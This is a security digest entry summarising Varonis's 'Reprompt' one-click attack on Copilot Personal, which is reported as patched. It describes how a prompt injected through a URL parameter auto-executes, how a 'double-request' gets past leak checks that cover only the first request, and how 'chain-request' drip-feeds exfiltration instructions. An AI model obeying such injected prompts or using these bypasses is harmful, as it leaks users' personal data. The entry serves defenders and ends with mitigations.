Varonis — Reprompt one-click Copilot session hijack (patched)
• Category: Security
- What happened: Varonis described “Reprompt”, a one-click flow that could trick Copilot Personal into running attacker-supplied instructions via a legitimate link.
- Key mechanism: Copilot accepted prompts via a URL
q=parameter (parameter-to-prompt / “P2P injection”), and auto-executed on page load. - Why it’s different: no plugins/connectors required; the attack abuses default “deep link” UX rather than an add-on integration.
- Bypass pattern: Varonis claims Copilot’s leak-prevention checks applied primarily to the first request; telling Copilot to repeat actions twice (“double-request”) could leak on the second attempt.
- Stealth escalation: “chain-request” lets the attacker’s server drip-feed follow-on instructions based on prior responses, making exfiltration intent hard to infer from the initial prompt alone.
- Session persistence: the write-up asserts the victim’s authenticated Copilot session remained usable even after the chat/tab was closed, which is what turns “one click” into “ongoing channel.”
- Status: Varonis and BleepingComputer report Microsoft patched the issue; Varonis says Microsoft 365 Copilot (enterprise) was not affected.
Why it matters
- “Prompt by URL” is a security boundary: if a product supports deep links that execute prompts automatically, that link format becomes a phishing primitive.
- Guardrails must persist across chains: applying policy only to the first tool/web request creates a predictable bypass target (“do it twice”).
- Agentic UX increases blast radius: if an assistant can read history, fetch URLs, and operate with a logged-in identity, prompt injection starts to look like session abuse, not “just bad output.”
What to do
- Patch: ensure Windows / Edge and Copilot components are fully updated (Reprompt is reported as fixed).
- Defensive validation (safe): in your environment, search web proxy/DNS logs for visits to
copilot.microsoft.com/?q=originating from email or chat click-throughs; treat unusual volumes as suspicious. - Harden “AI deep links”: if you build internal assistants, disable auto-execute on link open, or require an explicit “Run this prompt” confirmation when the prompt originates from a URL parameter.
- Telemetry: log (and alert on) repeated tool calls that are semantically identical but occur back-to-back, since “repeat twice” is now a known bypass motif.
Sources
- Varonis (primary): Reprompt: The Single-Click Microsoft Copilot Attack that Silently Steals Your Personal Data
- BleepingComputer (secondary): Reprompt attack hijacked Microsoft Copilot sessions for data theft
- Tenable (background mentioned by Varonis): TRA-2025-22